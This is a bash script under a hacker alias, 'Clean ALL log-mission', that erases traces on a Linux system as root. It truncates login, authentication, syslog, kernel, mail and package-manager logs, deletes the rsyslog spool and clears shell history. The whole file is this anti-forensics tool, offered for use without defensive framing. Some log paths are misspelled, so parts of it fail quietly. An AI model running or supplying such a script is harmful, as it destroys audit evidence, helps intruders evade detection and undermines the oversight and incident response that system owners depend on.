#!/bin/bash
# by C4ry_Anonymous create
# Support Debian/Centos/Archlinux
# Log query method: cat /etc/rsyslog.conf
#
echo "# # # # # # # # # # # # # # # # "
echo "################################"
echo "#                              #"
echo "#     Clean ALL log-mission    #"
echo "#        C4ry_Anonymous        #"
echo "#                              #"
echo "################################"
echo "# # # # # # # # # # # # # # # # "
echo "Please enter ROOT to work"

echo "# # # # # # # # # # "
echo "# # # # # # # # "
echo "# # # # # # "
echo "# # # # "
echo "# # "
echo "Clearing login information ..."
cat /dev/null > /var/log/wtemp
cat /dev/null > /var/log/btemp 2>/dev/null
cat /dev/null > /var/log/lastlog 2>/dev/null
cat /dev/null > /var/log/secure 2>/dev/null
echo "Clearing used information ..."
cat /dev/null > /var/log/dpkg.log 2>/dev/null
cat /dev/null > /var/log/faillog 2>/dev/null
cat /dev/null > /var/log/fontconfig.log 2>/dev/null
cat /dev/null > /var/log/alternatives.log 2>/dev/null
cat /dev/null > /var/log/bootstrap.log 2>/dev/null
cat /dev/null > /var/log/apt/history.log
echo "Please wait for the program to complete ..."
cat /dev/null > /var/log/apt/term.log 2>/dev/null
cat /dev/null > /var/log/boot.log 2>/dev/null
cat /dev/null > /var/log/auth.log 2>/dev/null
cat /dev/null > /var/log/crog 2>/dev/null
cat /dev/null > /var/log/dmesg 2>/dev/null
cat /dev/null > /var/log/firewalld 2>/dev/null
cat /dev/null > /var/log/mail.log 2>/dev/null
cat /dev/null > /var/log/messages
cat /dev/null > /var/log/spooler 2>/dev/null
cat /dev/null > /var/log/syslog 2>/dev/null
cat /dev/null > /var/log/tallylog 2>/dev/null
cat /dev/null > /var/log/yum.log 2>/dev/null
cat /dev/null > /var/log/kern.log 2>/dev/null
cat /dev/null > /var/log/user.log 2>/dev/null
rm -r /var/spool/rsyslog/*
history -c && history -w
echo "It's done !!!"
